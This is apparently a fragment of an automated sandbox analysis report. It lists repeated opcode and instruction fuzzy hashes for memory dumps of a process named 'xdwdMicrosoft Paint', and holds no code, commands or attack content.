                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cdb2988f97767fa7580ce67a06d627f48ddf85f1a39bb17844b35d4d6b9c45b9
                              • Instruction ID: 9e1e943e0440581443f24f74c6320032dd5fff227fbdd981214d48a7fee26507
                              • Opcode Fuzzy Hash: cdb2988f97767fa7580ce67a06d627f48ddf85f1a39bb17844b35d4d6b9c45b9
                              • Instruction Fuzzy Hash: 83217372D2C50B86FF68D5A8C82637833D4DB65311F740A3AE99DD33D1ED1C651A51C1
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8475ddf24f026dd722fa176073e741de48a5b5196e46260c5ce4ad426236df69
                              • Instruction ID: f651ddfd8b645190866df36fa749456d282a1e9d270f2e3fd79ec52e5ff7f673
                              • Opcode Fuzzy Hash: 8475ddf24f026dd722fa176073e741de48a5b5196e46260c5ce4ad426236df69
                              • Instruction Fuzzy Hash: 11212765A0E3C24FEB13977498A52A47FB18F53224F1A01F7D089CB5E3E91D985B8362
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c3f04d0f8e2c02adc6728c506bbc8578725da070206482c87a624c9e26929aec
                              • Instruction ID: 4abd7eb13c2196e4ff344b4df17e044e4da79c40cf9b105dd931c5dabf708ee6
                              • Opcode Fuzzy Hash: c3f04d0f8e2c02adc6728c506bbc8578725da070206482c87a624c9e26929aec
                              • Instruction Fuzzy Hash: 1C213B31A2C81ADFEB94FB68C4596BC77E5FF58301F200479F51ED32A2DE2868819741
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5985ced97a8794e629e837d16d9afb3a40ffa3d72b5cb696e670c090a7d82594
                              • Instruction ID: 11e1ddf9b1280c291f0a01cb9a4553a28bf73d664603f2e79009912875791471
                              • Opcode Fuzzy Hash: 5985ced97a8794e629e837d16d9afb3a40ffa3d72b5cb696e670c090a7d82594
                              • Instruction Fuzzy Hash: 78312870518B8C8FEBA4DF28C8457D97BE1FFA8710F10866AE84DC7255CB39A945CB81
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9682d0d571bc3a6e9e55d9812949b17d70f1f903877f6043d99297ef8eb7b967
                              • Instruction ID: 715d38286a14fdfa36cd7bb51f48086088784d345e62286e4809a16c7395ea46
                              • Opcode Fuzzy Hash: 9682d0d571bc3a6e9e55d9812949b17d70f1f903877f6043d99297ef8eb7b967
                              • Instruction Fuzzy Hash: B1219062D2C04786FF6C9A98C82A27837D8DF25311F351A3AE99DC77D2ED1C650A61C1
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d1e27da35fc186851482d9d12c47c844ea22ca2b38fd075b31840c9a49955891
                              • Instruction ID: 94e343e24e4fd584ffa5db7395b61872bbb73c926eb26712355384415577c707
                              • Opcode Fuzzy Hash: d1e27da35fc186851482d9d12c47c844ea22ca2b38fd075b31840c9a49955891
                              • Instruction Fuzzy Hash: F421B322E1C645CFEB569728C8656A83BE8EF66320F2901B7E04DD73D2EC2C5C099352
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b7f85f3313491f379d3799113982f425b722dc6572b9acedf6936d56b9672230
                              • Instruction ID: 20fd845b4c212ede2b13a25f52715c660a816d026d3250b02781aa3d1d2d6a30
                              • Opcode Fuzzy Hash: b7f85f3313491f379d3799113982f425b722dc6572b9acedf6936d56b9672230
                              • Instruction Fuzzy Hash: 83115170A2991A8FE794F73C84692BC77E1FF5C311B5404B9E50EE33A2ED24AC419780
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 30ea7f37ef71406a1e2a723d45fd85f5fc0c50b9fbfe09e61c3687123046b3f6
                              • Instruction ID: 700ebdb907ce520a6ab04d3cbb85751d4a48de553b5f66f98c6b76ee2fae32ea
                              • Opcode Fuzzy Hash: 30ea7f37ef71406a1e2a723d45fd85f5fc0c50b9fbfe09e61c3687123046b3f6
                              • Instruction Fuzzy Hash: 62018032F2DD6A8AF694663C91652F863D6EB59320B5904BBE80EE33D1ED1D5C825380
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fc6cc2b936536ffc1f8e15366c99711c73249d7e81d6554c474f2e041c156c97
                              • Instruction ID: 0dbab03d18b43dd1fb1cd92906d38309a8bb8977119e490f1f89df2d0d9209e4
                              • Opcode Fuzzy Hash: fc6cc2b936536ffc1f8e15366c99711c73249d7e81d6554c474f2e041c156c97
                              • Instruction Fuzzy Hash: 45011232E6C51D89FF58A25CA4535F863D5DB46334F240077E65E932C2DC193C5293C5
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4132da37863102ff7bb70212f531a98c29bc7bca8e652a365c109bc957091b71
                              • Instruction ID: 582c8c41237c9a6a7c704aee6094df21aa3cc321d10abc46cd4ded3c8ad54a97
                              • Opcode Fuzzy Hash: 4132da37863102ff7bb70212f531a98c29bc7bca8e652a365c109bc957091b71
                              • Instruction Fuzzy Hash: 77014031E2C91C9EEB50EB6CD4886AC77E9FF58321F150237E44DE3290DE3858818781
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 16358d968be7b6a0d9cebfb93859d4413bf2b15816b7ca69a36a16b30af709e9
                              • Instruction ID: 3061f076684b6b007141467294b50f73b589be59f5c725ce5c59f1ec6c577436
                              • Opcode Fuzzy Hash: 16358d968be7b6a0d9cebfb93859d4413bf2b15816b7ca69a36a16b30af709e9
                              • Instruction Fuzzy Hash: 18011230B2C91ACFEB84E76C94556B873D1EF49305B600079E50EC33A2ED25AC429B40
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c989ea6f71ff5d453dea08b1b6474f98225e31beec01a2f790754889de3998a9
                              • Instruction ID: e9e89ca1b3ac7a03f4aeea6e2ab0626fefb0851af608c92077f4a2390a394797
                              • Opcode Fuzzy Hash: c989ea6f71ff5d453dea08b1b6474f98225e31beec01a2f790754889de3998a9
                              • Instruction Fuzzy Hash: 7DF09646C3E46B8AF79071A8E4552A873C4FB153A0F6E0870E98CD72C1DD0D1C4123D9
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7d927548f172c14d579b24a4596919dc4f8509051651c34f2448c594530dfb5b
                              • Instruction ID: 3f6ddbeef207d27c2f5a83139b08710c9670cb4eaf515712a5d772210861c5ea
                              • Opcode Fuzzy Hash: 7d927548f172c14d579b24a4596919dc4f8509051651c34f2448c594530dfb5b
                              • Instruction Fuzzy Hash: 50E06D10F2D80E86AAA8511D28602B912C9DBA6310FB8023EF50EC37C0EC9E5C832295
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eb65ced9a50445ba8fc7b8d4f53ade41dd3d12624671f02cbf7b23c081541d94
                              • Instruction ID: c79f28b7d37efb16a186a6064839ef57f2abbbee8122aacae2332b63426d8c6f
                              • Opcode Fuzzy Hash: eb65ced9a50445ba8fc7b8d4f53ade41dd3d12624671f02cbf7b23c081541d94
                              • Instruction Fuzzy Hash: 51E01211F3D81B95B6A8212D68551B922C9DB8BB50F74073EF40DD23C9FE8CAC836193
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 48ff86202776cce8c0526b9a2216b95e0586c4d0ac40073048de183ac7eef0b5
                              • Instruction ID: d366286556cc3fc54417c088b55a4645f0f7fc964385b1a60c2ddf68593e517e
                              • Opcode Fuzzy Hash: 48ff86202776cce8c0526b9a2216b95e0586c4d0ac40073048de183ac7eef0b5
                              • Instruction Fuzzy Hash: 24E0923192C5558FEB002650E4840F963D4EF9B310F6405B6E848C72D3CC1D25939394
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 65e8a3c46c8608babf5b3722bf3a73274e6a9a02369f14694569c2e4a84e7413
                              • Instruction ID: 26cc7a2d45cf90f117b8b2208c67cf394bbf2e1281673ccc640fb6803bffdb21
                              • Opcode Fuzzy Hash: 65e8a3c46c8608babf5b3722bf3a73274e6a9a02369f14694569c2e4a84e7413
                              • Instruction Fuzzy Hash: 0BE0222092C2A28FE3201720E0981F877D4FF56310F2408B6E4085B6D3CC2E26826311
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7809d5c54a5d21497828a9f54317656a3c0bbf0800ac38d3ca169797fdb209f6
                              • Instruction ID: 235e90c69d9779d9fe7d6ae0a7fddf91ec38ad48a879128755f58b7ceceb4fe8
                              • Opcode Fuzzy Hash: 7809d5c54a5d21497828a9f54317656a3c0bbf0800ac38d3ca169797fdb209f6
                              • Instruction Fuzzy Hash: DFE06D32E2C93A8AF6A8363891152F852D5EB49361F9908B7E80DD33D2ED1D9D815280
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3e0efbce6c77c564b7706b52107fb7121fc7df6c933097c97e9c2363ab4e2eef
                              • Instruction ID: 146c8d460a875ce19c41dd37062740be557ce1c7876c604c459006976397a82a
                              • Opcode Fuzzy Hash: 3e0efbce6c77c564b7706b52107fb7121fc7df6c933097c97e9c2363ab4e2eef
                              • Instruction Fuzzy Hash: 66E09A32E3D44A96FBF891294809A3626CDDBD0350F311D3AFA0DC33D4ED1CA8866696
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 702563ce90e0393ee801919a3f3be75b49cbe2a68b059c93ccaf6169103901bc
                              • Instruction ID: 4266c40ec1585e508b47c753ed47c13cfc46f7c7a874c37376c470353966b2e4
                              • Opcode Fuzzy Hash: 702563ce90e0393ee801919a3f3be75b49cbe2a68b059c93ccaf6169103901bc
                              • Instruction Fuzzy Hash: B9F06520E3D90796F754A224C5891B612C9EF17345F74477CF90B833C5DD9DBC426182
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7b94df1f68bb0ca647fe0c3c0dc20f41e5619a6d77dd09d321cf6d33b4a8906f
                              • Instruction ID: 536c5e44d3f310561ae23e98b61bd376382c56d8d42d491359a52ad62f31a665
                              • Opcode Fuzzy Hash: 7b94df1f68bb0ca647fe0c3c0dc20f41e5619a6d77dd09d321cf6d33b4a8906f
                              • Instruction Fuzzy Hash: 0FE08601B2CC498BE681B33800792BC47E3EF9A305728007AE44EC3393ED585D036305
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d66117756e6d7ca0f8c1facb36af2a9f31fa8c1be915c29f6928b0f1bc6ad4af
                              • Instruction ID: 72d0782125199da3052597862adfea3e98b0595865d9f47ff2f0158105cd1224
                              • Opcode Fuzzy Hash: d66117756e6d7ca0f8c1facb36af2a9f31fa8c1be915c29f6928b0f1bc6ad4af
                              • Instruction Fuzzy Hash: 32D05E3161D90DCECF45ABA494063FD77A4FF85319FA0187AE10ADA2C1CE3A84A4D7C0
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 206e1c6549962e3a45060f6bbc7891bbed173d67357739a4cc7aa0f69d6fb7bf
                              • Instruction ID: 10f852d9b573ce49847f632c57905c4d2bac3b720d09fe61512c933ce6cca8e9
                              • Opcode Fuzzy Hash: 206e1c6549962e3a45060f6bbc7891bbed173d67357739a4cc7aa0f69d6fb7bf
                              • Instruction Fuzzy Hash: 84C0801171DC085B5640F11C649E77D63D2E7EC161728413ED40DC3355DC34D9478342
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7b06f8108f355254a861dae0793761e1f51959e65a191ae3a6e4d1208b9b0a56
                              • Instruction ID: 310dbc2472decb4e558391ea125394f77190fdba0fd801815b7fc893a2a9935c
                              • Opcode Fuzzy Hash: 7b06f8108f355254a861dae0793761e1f51959e65a191ae3a6e4d1208b9b0a56
                              • Instruction Fuzzy Hash: 03D0123165A71589E758373966111A862C5EF45256B9404BAE90DC43A2FD2EC5C14350
                              Memory Dump Source
                              • Source File: 00000040.00000002.1357495482.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_64_2_7fff60f60000_xdwdMicrosoft Paint.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5ecfb4522fe41fab7df08b19ca74bd3a197deb4e4662c1e81acd057a591f07bb
                              • Instruction ID: eaab48cd6b7b447fd7e08d554f13cdbc886689a98a0f3e2637f00d175d5f409d
                              • Opcode Fuzzy Hash: 5ecfb4522fe41fab7df08b19ca74bd3a197deb4e4662c1e81acd057a591f07bb
                              • Instruction Fuzzy Hash: 69A00214B1580F0A76C4A13C041937941CBE7A9282B6480B7690DCA296DD1459410716